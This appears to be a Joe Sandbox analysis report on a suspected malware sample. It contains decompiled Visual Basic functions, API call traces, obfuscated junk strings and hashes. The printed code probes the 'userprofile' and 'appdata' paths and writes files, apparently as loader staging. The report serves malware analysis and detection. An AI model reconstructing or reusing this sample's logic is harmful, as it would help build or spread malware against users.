Instruction ID: 665c5ac88146405e36e8af37faa6f8d3c11867cc9c7350d2edc6c8d86d4f3cc5
Opcode Fuzzy Hash: 45c22661a0090f8c8540ce5da25b2cbfa253f3f5eb553b806734f9eaeaaebb22
Instruction Fuzzy Hash: 3AC04CB61017858FEF42DE09C551B4573B0EB15A88F0904A0D802CFB22E318ED10C700

Uniqueness

Uniqueness Score: -1.00%

Function 04D1ACF0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00424E6F, Relevance: 187.7, APIs: 90, Strings: 17, Instructions: 444
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00424E6F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v40;
				char _v52;
				char _v60;
				char _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v80;
				char _v96;
				char* _v104;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _t269;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t292;
				signed int _t296;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				char* _t311;
				void* _t418;
				void* _t420;
				intOrPtr _t421;

				_t421 = _t420 - 0xc;
				 *[fs:0x0] = _t421;
				L004015F0();
				_v16 = _t421;
				_v12 = 0x401578;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t418);
				L004018DE();
				_push(8);
				_push(0x404584);
				_t269 =  &_v52;
				_push(_t269);
				L0040187E();
				_v120 = _v120 & 0x00000000;
				if(_v120 >= 0x16) {
					L00401824();
					_v132 = _t269;
				} else {
					_v132 = _v132 & 0x00000000;
				}
				_push(0xcb);
				_push(L"brash");
				L004018CC();
				L0040192C();
				_push(_t269);
				L0040169E();
				L0040192C();
				L004018DE();
				_push( &_v64);
				_t272 =  &_v60;
				_push(_t272);
				_push(2);
				L00401914();
				_v120 = 1;
				if(_v120 >= 0x16) {
					L00401824();
					_v136 = _t272;
				} else {
					_v136 = _v136 & 0x00000000;
				}
				_t273 = _v120;
				L004018DE();
				_push(0x39);
				_push(0x11);
				_push(0x21);
				L0040191A();
				_v72 = _t273;
				_v80 = 3;
				_v120 = 2;
				if(_v120 >= 0x16) {
					L00401824();
					_v140 = _t273;
				} else {
					_v140 = _v140 & 0x00000000;
				}
				_push( &_v80);
				L004016B6();
				L0040192C();
				_t275 = _v120;
				L004018DE();
				L004018E4();
				L00401938();
				_v120 = 3;
				if(_v120 >= 0x16) {
					L00401824();
					_v144 = _t275;
				} else {
					_v144 = _v144 & 0x00000000;
				}
				_t276 = _v120;
				L004018DE();
				_v72 = 0x93338130;
				_v68 = 0x5afa;
				_v80 = 6;
				_v120 = 4;
				if(_v120 >= 0x16) {
					L00401824();
					_v148 = _t276;
				} else {
					_v148 = _v148 & 0x00000000;
				}
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v80);
				L00401818();
				L0040192C();
				_t278 = _v120;
				L004018DE();
				L004018E4();
				L00401938();
				_v120 = 5;
				if(_v120 >= 0x16) {
					L00401824();
					_v152 = _t278;
				} else {
					_v152 = _v152 & 0x00000000;
				}
				_t279 = _v120;
				L004018DE();
				_v120 = 6;
				if(_v120 >= 0x16) {
					L00401824();
					_v156 = _t279;
				} else {
					_v156 = _v156 & 0x00000000;
				}
				_t280 = _v120;
				L004018DE();
				_v120 = 7;
				if(_v120 >= 0x16) {
					L00401824();
					_v160 = _t280;
				} else {
					_v160 = _v160 & 0x00000000;
				}
				_t281 = _v120;
				L004018DE();
				_v120 = 8;
				if(_v120 >= 0x16) {
					L00401824();
					_v164 = _t281;
				} else {
					_v164 = _v164 & 0x00000000;
				}
				_push(0xfd);
				_push(L"Superengrave");
				L004018CC();
				L0040192C();
				_t282 = _v120;
				L004018DE();
				L004018E4();
				_v120 = 9;
				if(_v120 >= 0x16) {
					L00401824();
					_v168 = _t282;
				} else {
					_v168 = _v168 & 0x00000000;
				}
				_t283 = _v120;
				L004018DE();
				_v120 = 0xa;
				if(_v120 >= 0x16) {
					L00401824();
					_v172 = _t283;
				} else {
					_v172 = _v172 & 0x00000000;
				}
				_t284 = _v120;
				L004018DE();
				_v120 = 0xb;
				if(_v120 >= 0x16) {
					L00401824();
					_v176 = _t284;
				} else {
					_v176 = _v176 & 0x00000000;
				}
				_t285 = _v120;
				L004018DE();
				_v120 = 0xc;
				if(_v120 >= 0x16) {
					L00401824();
					_v180 = _t285;
				} else {
					_v180 = _v180 & 0x00000000;
				}
				_t286 = _v120;
				L004018DE();
				_v120 = 0xd;
				if(_v120 >= 0x16) {
					L00401824();
					_v184 = _t286;
				} else {
					_v184 = _v184 & 0x00000000;
				}
				L004018DE();
				_push(L"3:3:3");
				_t288 =  &_v80;
				_push(_t288);
				L00401752();
				_v120 = 0xe;
				if(_v120 >= 0x16) {
					L00401824();
					_v188 = _t288;
				} else {
					_v188 = _v188 & 0x00000000;
				}
				_push( &_v80);
				L00401908();
				L0040192C();
				L004018DE();
				L004018E4();
				L00401938();
				_v104 = L"Vetoes5";
				_v112 = 8;
				L004018FC();
				_push( &_v80);
				_t292 =  &_v96;
				_push(_t292);
				L00401902();
				_v120 = 0xf;
				if(_v120 >= 0x16) {
					L00401824();
					_v192 = _t292;
				} else {
					_v192 = _v192 & 0x00000000;
				}
				_push( &_v96);
				L00401908();
				L0040192C();
				L004018DE();
				L004018E4();
				_push( &_v96);
				_t296 =  &_v80;
				_push(_t296);
				_push(2);
				L004018F6();
				_v120 = 0x10;
				if(_v120 >= 0x16) {
					L00401824();
					_v196 = _t296;
				} else {
					_v196 = _v196 & 0x00000000;
				}
				L004018DE();
				_push(0x14);
				_push(0xe6);
				_push(0xd8);
				_t298 =  &_v80;
				_push(_t298);
				L004016A4();
				_v120 = 0x11;
				if(_v120 >= 0x16) {
					L00401824();
					_v200 = _t298;
				} else {
					_v200 = _v200 & 0x00000000;
				}
				_push( &_v80);
				L00401908();
				L0040192C();
				_t300 = _v120;
				L004018DE();
				L004018E4();
				L00401938();
				_v120 = 0x12;
				if(_v120 >= 0x16) {
					L00401824();
					_v204 = _t300;
				} else {
					_v204 = _v204 & 0x00000000;
				}
				_t301 = _v120;
				L004018DE();
				_v120 = 0x13;
				if(_v120 >= 0x16) {
					L00401824();
					_v208 = _t301;
				} else {
					_v208 = _v208 & 0x00000000;
				}
				L0040190E();
				L0040192C();
				_t302 = _v120;
				L004018DE();
				L004018E4();
				_v120 = 0x14;
				if(_v120 >= 0x16) {
					L00401824();
					_v212 = _t302;
				} else {
					_v212 = _v212 & 0x00000000;
				}
				L004018DE();
				_v72 = 0x11cb83;
				_v80 = 3;
				_push( &_v80);
				_t305 =  &_v96;
				_push(_t305);
				L004018F0();
				_v120 = 0x15;
				if(_v120 >= 0x16) {
					L00401824();
					_v216 = _t305;
				} else {
					_v216 = _v216 & 0x00000000;
				}
				_push( &_v96);
				L00401908();
				L0040192C();
				L004018DE();
				L004018E4();
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L004018F6();
				_push(0x425555);
				L004018E4();
				_v116 =  &_v52;
				_t311 =  &_v116;
				_push(_t311);
				_push(0);
				L004017A0();
				return _t311;
			}

0x00424e72
0x00424e81
0x00424e8d
0x00424e95
0x00424e98
0x00424e9f
0x00424eae
0x00424eb7
0x00424ebc
0x00424ebe
0x00424ec3
0x00424ec6
0x00424ec7
0x00424ecc
0x00424ed4
0x00424edc
0x00424ee1
0x00424ed6
0x00424ed6
0x00424ed6
0x00424ee4
0x00424ee9
0x00424eee
0x00424ef8
0x00424efd
0x00424efe
0x00424f08
0x00424f18
0x00424f20
0x00424f21
0x00424f24
0x00424f25
0x00424f27
0x00424f2f
0x00424f3a
0x00424f45
0x00424f4a
0x00424f3c
0x00424f3c
0x00424f3c
0x00424f55
0x00424f5e
0x00424f63
0x00424f65
0x00424f67
0x00424f69
0x00424f6e
0x00424f71
0x00424f78
0x00424f83
0x00424f8e
0x00424f93
0x00424f85
0x00424f85
0x00424f85
0x00424f9c
0x00424f9d
0x00424fa7
0x00424fae
0x00424fb7
0x00424fbf
0x00424fc7
0x00424fcc
0x00424fd7
0x00424fe2
0x00424fe7
0x00424fd9
0x00424fd9
0x00424fd9
0x00424ff2
0x00424ffb
0x00425000
0x00425007
0x0042500e
0x00425015
0x00425020
0x0042502b
0x00425030
0x00425022
0x00425022
0x00425022
0x00425036
0x00425038
0x0042503a
0x0042503c
0x00425041
0x00425042
0x0042504c
0x00425053
0x0042505c
0x00425064
0x0042506c
0x00425071
0x0042507c
0x00425087
0x0042508c
0x0042507e
0x0042507e
0x0042507e
0x00425097
0x004250a0
0x004250a5
0x004250b0
0x004250bb
0x004250c0
0x004250b2
0x004250b2
0x004250b2
0x004250cb
0x004250d4
0x004250d9
0x004250e4
0x004250ef
0x004250f4
0x004250e6
0x004250e6
0x004250e6
0x004250ff
0x00425108
0x0042510d
0x00425118
0x00425123
0x00425128
0x0042511a
0x0042511a
0x0042511a
0x0042512e
0x00425133
0x00425138
0x00425142
0x00425149
0x00425152
0x0042515a
0x0042515f
0x0042516a
0x00425175
0x0042517a
0x0042516c
0x0042516c
0x0042516c
0x00425185
0x0042518e
0x00425193
0x0042519e
0x004251a9
0x004251ae
0x004251a0
0x004251a0
0x004251a0
0x004251b9
0x004251c2
0x004251c7
0x004251d2
0x004251dd
0x004251e2
0x004251d4
0x004251d4
0x004251d4
0x004251ed
0x004251f6
0x004251fb
0x00425206
0x00425211
0x00425216
0x00425208
0x00425208
0x00425208
0x00425221
0x0042522a
0x0042522f
0x0042523a
0x00425245
0x0042524a
0x0042523c
0x0042523c
0x0042523c
0x0042525e
0x00425263
0x00425268
0x0042526b
0x0042526c
0x00425271
0x0042527c
0x00425287
0x0042528c
0x0042527e
0x0042527e
0x0042527e
0x00425295
0x00425296
0x004252a0
0x004252b0
0x004252b8
0x004252c0
0x004252c5
0x004252cc
0x004252d9
0x004252e1
0x004252e2
0x004252e5
0x004252e6
0x004252eb
0x004252f6
0x00425301
0x00425306
0x004252f8
0x004252f8
0x004252f8
0x0042530f
0x00425310
0x0042531a
0x0042532a
0x00425332
0x0042533a
0x0042533b
0x0042533e
0x0042533f
0x00425341
0x00425349
0x00425354
0x0042535f
0x00425364
0x00425356
0x00425356
0x00425356
0x00425378
0x0042537d
0x0042537f
0x00425384
0x00425389
0x0042538c
0x0042538d
0x00425392
0x0042539d
0x004253a8
0x004253ad
0x0042539f
0x0042539f
0x0042539f
0x004253b6
0x004253b7
0x004253c1
0x004253c8
0x004253d1
0x004253d9
0x004253e1
0x004253e6
0x004253f1
0x004253fc
0x00425401
0x004253f3
0x004253f3
0x004253f3
0x0042540c
0x00425415
0x0042541a
0x00425425
0x00425430
0x00425435
0x00425427
0x00425427
0x00425427
0x0042543b
0x00425445
0x0042544c
0x00425455
0x0042545d
0x00425462
0x0042546d
0x00425478
0x0042547d
0x0042546f
0x0042546f
0x0042546f
0x00425491
0x00425496
0x0042549d
0x004254a7
0x004254a8
0x004254ab
0x004254ac
0x004254b1
0x004254bc
0x004254c7
0x004254cc
0x004254be
0x004254be
0x004254be
0x004254d5
0x004254d6
0x004254e0
0x004254f0
0x004254f8
0x00425500
0x00425504
0x00425505
0x00425507
0x0042550f
0x0042553e
0x00425546
0x00425549
0x0042554c
0x0042554d
0x0042554f
0x00425554

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00424E8D
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424EB7
__vbaAryConstruct2.MSVBVM60(?,00404584,00000008,?,?,?,?,004015F6), ref: 00424EC7
__vbaGenerateBoundsError.MSVBVM60 ref: 00424EDC
#616.MSVBVM60(brash,000000CB), ref: 00424EEE
__vbaStrMove.MSVBVM60(brash,000000CB), ref: 00424EF8
#523.MSVBVM60(00000000,brash,000000CB), ref: 00424EFE
__vbaStrMove.MSVBVM60(00000000,brash,000000CB), ref: 00424F08
__vbaStrCopy.MSVBVM60(00000000,brash,000000CB), ref: 00424F18
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,brash,000000CB), ref: 00424F27
__vbaGenerateBoundsError.MSVBVM60 ref: 00424F45
__vbaStrCopy.MSVBVM60 ref: 00424F5E
#588.MSVBVM60(00000021,00000011,00000039), ref: 00424F69
__vbaGenerateBoundsError.MSVBVM60(00000021,00000011,00000039), ref: 00424F8E
#574.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424F9D
__vbaStrMove.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FA7
__vbaStrCopy.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FB7
__vbaFreeStr.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FBF
__vbaFreeVar.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FC7
__vbaGenerateBoundsError.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FE2
__vbaStrCopy.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FFB
__vbaGenerateBoundsError.MSVBVM60(00000003,00000021,00000011,00000039), ref: 0042502B
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425042
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042504C
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042505C
__vbaFreeStr.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425064
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042506C
__vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425087
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250A0
__vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250BB
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250D4
__vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250EF
__vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425108
__vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425123
#616.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425138
__vbaStrMove.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425142
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425152
__vbaFreeStr.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042515A
__vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425175
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042518E
__vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251A9
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251C2
__vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251DD
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251F6
__vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425211
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042522A
__vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425245
__vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042525E
#541.MSVBVM60(00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042526C
__vbaGenerateBoundsError.MSVBVM60(00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425287
__vbaStrVarMove.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425296
__vbaStrMove.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252A0
__vbaStrCopy.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252B0
__vbaFreeStr.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252B8
__vbaFreeVar.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252C0
__vbaVarDup.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252D9
#528.MSVBVM60(?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252E6
__vbaGenerateBoundsError.MSVBVM60(?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425301
__vbaStrVarMove.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 00425310
__vbaStrMove.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 0042531A
__vbaStrCopy.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 0042532A
__vbaFreeStr.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 00425332
__vbaFreeVarList.MSVBVM60(00000002,00000006,?,?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00425341
__vbaGenerateBoundsError.MSVBVM60 ref: 0042535F
__vbaStrCopy.MSVBVM60 ref: 00425378
#539.MSVBVM60(?,000000D8,000000E6,00000014), ref: 0042538D
__vbaGenerateBoundsError.MSVBVM60(?,000000D8,000000E6,00000014), ref: 004253A8
__vbaStrVarMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253B7
__vbaStrMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253C1
__vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253D1
__vbaFreeStr.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253D9
__vbaFreeVar.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253E1
__vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253FC
__vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425415
__vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425430
#669.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 0042543B
__vbaStrMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425445
__vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425455
__vbaFreeStr.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 0042545D
__vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425478
__vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425491
#575.MSVBVM60(?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254AC
__vbaGenerateBoundsError.MSVBVM60(?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254C7
__vbaStrVarMove.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254D6
__vbaStrMove.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254E0
__vbaStrCopy.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254F0
__vbaFreeStr.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254F8
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 00425507
__vbaFreeStr.MSVBVM60(00425555,?,?,?,?,?,?,?,?,004015F6), ref: 0042553E
__vbaAryDestruct.MSVBVM60(00000000,?,00425555,?,?,?,?,?,?,?,?,004015F6), ref: 0042554F

Strings

Acrobystitis, xrefs: 00424F50
Vetoes5, xrefs: 004252C5
brash, xrefs: 00424EE9
Driftsstyringen9, xrefs: 004250FA
Registranters, xrefs: 00425250
Bankerstatning, xrefs: 00425180
Besudle, xrefs: 00424FED
3:3:3, xrefs: 00425263
FRSTEHAANDSFORKLARINGENS, xrefs: 0042521C
Tarzanish9, xrefs: 004251B4
bacterious, xrefs: 004251E8
REJECTEE, xrefs: 00425407
Arbejdsmaterialerne, xrefs: 00425092
Superengrave, xrefs: 00425133
skrllen, xrefs: 00425483
Emballages, xrefs: 0042536A
POLYGYNIC, xrefs: 004250C6

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Copy$BoundsErrorGenerate$Free$Move$List$#616$#523#528#539#541#574#575#588#669#703ChkstkConstruct2Destruct
String ID: 3:3:3$Acrobystitis$Arbejdsmaterialerne$Bankerstatning$Besudle$Driftsstyringen9$Emballages$FRSTEHAANDSFORKLARINGENS$POLYGYNIC$REJECTEE$Registranters$Superengrave$Tarzanish9$Vetoes5$bacterious$brash$skrllen
API String ID: 1376337971-2520347186
Opcode ID: c06f55f5a652419b048ff17ef0b21eebc432ed462cc86b91663247d2885c240e
Instruction ID: 526504d4a619d3e4a300508990a312faa3cbc30d9d43923b8c6bdd5a6d112f35
Opcode Fuzzy Hash: c06f55f5a652419b048ff17ef0b21eebc432ed462cc86b91663247d2885c240e
Instruction Fuzzy Hash: 11121971E00218DBDB20EFA6D941BEDB7B0AF55308F60817EE00677292DB385A46CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00423002, Relevance: 98.3, APIs: 47, Strings: 9, Instructions: 317
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00423002(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				void* _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char _v116;
				char* _v124;
				char _v132;
				char* _v140;
				char _v148;
				char _v152;
				void* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				char _v196;
				signed int _v200;
				signed int _v204;
				void* _t153;
				signed int _t154;
				short _t164;
				char* _t169;
				signed int _t188;
				signed int _t193;
				signed int _t212;
				signed int _t217;
				void* _t248;
				void* _t250;
				intOrPtr _t251;
				void* _t252;

				_t251 = _t250 - 0xc;
				 *[fs:0x0] = _t251;
				L004015F0();
				_v16 = _t251;
				_v12 = 0x4014b0;
				_v8 = 0;
				_t153 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015f6, _t248);
				_v124 = L"userprofile";
				_v132 = 8;
				L004018FC();
				_push(0x7829a8);
				L00401920();
				L0040192C();
				_push(_t153);
				_t154 =  &_v80;
				_push(_t154);
				L0040172E();
				L0040192C();
				_push(_t154);
				L00401734();
				asm("sbb eax, eax");
				_v156 =  ~( ~( ~_t154));
				_push( &_v60);
				_push( &_v56);
				_push(2);
				L00401914();
				_t252 = _t251 + 0xc;
				L00401938();
				if(_v156 != 0) {
					_v124 = L"bugsering";
					_v132 = 8;
					L004018FC();
					_push(0xc7);
					_push( &_v80);
					_push( &_v96);
					L004017DC();
					_push( &_v96);
					L00401908();
					L0040192C();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L004018F6();
					_v124 = L"Zoosporangia5";
					_v132 = 8;
					L004018FC();
					_push(0);
					_push(0x80);
					_push( &_v80);
					_push( &_v96);
					L00401740();
					_push( &_v96);
					_push( &_v116);
					L00401722();
					_push( &_v116);
					_push( &_v44);
					L00401728();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L004018F6();
					_t252 = _t252 + 0x18;
					if( *0x427544 != 0) {
						_v184 = 0x427544;
					} else {
						_push(0x427544);
						_push(0x403c1c);
						L00401878();
						_v184 = 0x427544;
					}
					_t43 =  &_v184; // 0x427544
					_v156 =  *((intOrPtr*)( *_t43));
					_t212 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v64);
					asm("fclex");
					_v160 = _t212;
					if(_v160 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c0c);
						_push(_v156);
						_push(_v160);
						L0040193E();
						_v188 = _t212;
					}
					_v164 = _v64;
					_t217 =  *((intOrPtr*)( *_v164 + 0x118))(_v164,  &_v152);
					asm("fclex");
					_v168 = _t217;
					if(_v168 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403c2c);
						_push(_v164);
						_push(_v168);
						L0040193E();
						_v192 = _t217;
					}
					L0040173A();
					_v48 = _t217;
					L004018A2();
				}
				_v124 = L"appdata";
				_v132 = 8;
				L004018FC();
				_push( &_v80);
				_push( &_v96);
				L0040184E();
				_v140 = L"Aktiverings";
				_v148 = 0x8008;
				_push( &_v96);
				_t164 =  &_v148;
				_push(_t164);
				L0040175E();
				_v156 = _t164;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L004018F6();
				if(_v156 != 0) {
					_v72 = 0x6b;
					_v80 = 2;
					_push( &_v80);
					L0040171C();
					L0040192C();
					_v180 = _v56;
					_v56 = _v56 & 0x00000000;
					_v88 = _v180;
					_v96 = 8;
					_push(0);
					_push(0x80);
					_push( &_v96);
					_push( &_v112);
					L00401740();
					_push( &_v112);
